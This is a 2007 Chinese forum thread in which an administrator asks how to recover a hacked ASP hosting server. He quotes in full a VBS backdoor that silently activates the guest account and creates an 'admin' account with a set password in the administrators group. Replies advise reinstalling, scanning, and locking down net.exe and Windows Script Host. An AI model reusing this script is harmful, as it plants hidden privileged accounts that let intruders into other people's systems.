找回密码
 立即注册
搜索
查看: 110|回复: 7

一台服务器中招了,苦恼中

[复制链接]

602

主题

4540

回帖

6994

积分

管理员

积分
6994
发表于 2007-7-14 00:57:40 | 显示全部楼层 |阅读模式
给朋友做了虚拟主机,开了ASP,被黑,估计是埋下了啥东西,IP是219.138.224.192,现在进MS-DOS方式会先运行一个VBS,我把它删除了,是个开权限的东西,直接运行CMD.EXE文件也是这样,但CMD.exe文件没有啥变化。

怎么恢复呢?

那个vbs的内容是

dim wsh
set wsh=CreateObject("WScript.Shell")
wsh.run "net user guest /active:yes",0
wsh.run "net user guest 125699",0
wsh.run "net localgroup administrators guest /add",0
wsh.run "net1 user admin /active:yes",0
wsh.run "net1 user admin 125699 /add",0
wsh.run "net1 localgroup administrators admin /add",0


好狠吖

556

主题

6570

回帖

9409

积分

荣誉版主

积分
9409
发表于 2007-7-14 10:50:10 | 显示全部楼层
这个俺不懂了。只能帮小于顶一下了。:funk:
回复

使用道具 举报

384

主题

1503

回帖

2555

积分

荣誉版主

积分
2555
发表于 2007-7-15 07:48:01 | 显示全部楼层
既然都这样,稳妥的办法还是重装吧。谁知道还有没有其它后门呢?
回复

使用道具 举报

602

主题

4540

回帖

6994

积分

管理员

积分
6994
 楼主| 发表于 2007-7-15 11:33:01 | 显示全部楼层
重装工程太大了!!
回复

使用道具 举报

38

主题

993

回帖

1365

积分

荣誉版主

积分
1365
发表于 2007-7-15 20:46:32 | 显示全部楼层
用sreng扫了 放份log上来

不然很难分析啊
回复

使用道具 举报

1678

主题

5167

回帖

9302

积分

荣誉版主

沉痛悼念小于……

积分
9302
发表于 2007-7-18 10:57:00 | 显示全部楼层
我的做法是:把net.exe  net1.exe 的全部权限都去掉,黑客就无法使用这2个命令了

然后卸载Windows Script ,这样VBS也不能运行了
人似秋鸿来有信,事如春梦了无痕
回复

使用道具 举报

1663

主题

6万

回帖

8万

积分

荣誉版主

面朝大海˙春暖花开.♥

积分
83555
发表于 2007-7-23 09:10:43 | 显示全部楼层
辛苦了 老大
思之思之,其愿我往。忧心之劳,于凤求凰。涵降于斯,凤栖于时。不寐于夜,窃悦于辞。
回复

使用道具 举报

86

主题

2142

回帖

3152

积分

荣誉版主

积分
3152
发表于 2007-7-23 16:59:39 | 显示全部楼层
原帖由 wowh 于 2007-7-15 20:46 发表
用sreng扫了 放份log上来

不然很难分析啊

正想这么回呢,详见我签名
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Archiver|手机版|小黑屋|海浩社区

GMT+8, 2025-9-18 18:22 , Processed in 0.088103 second(s), 21 queries .

Powered by Discuz! X3.5

© 2001-2025 Discuz! Team.

快速回复 返回顶部 返回列表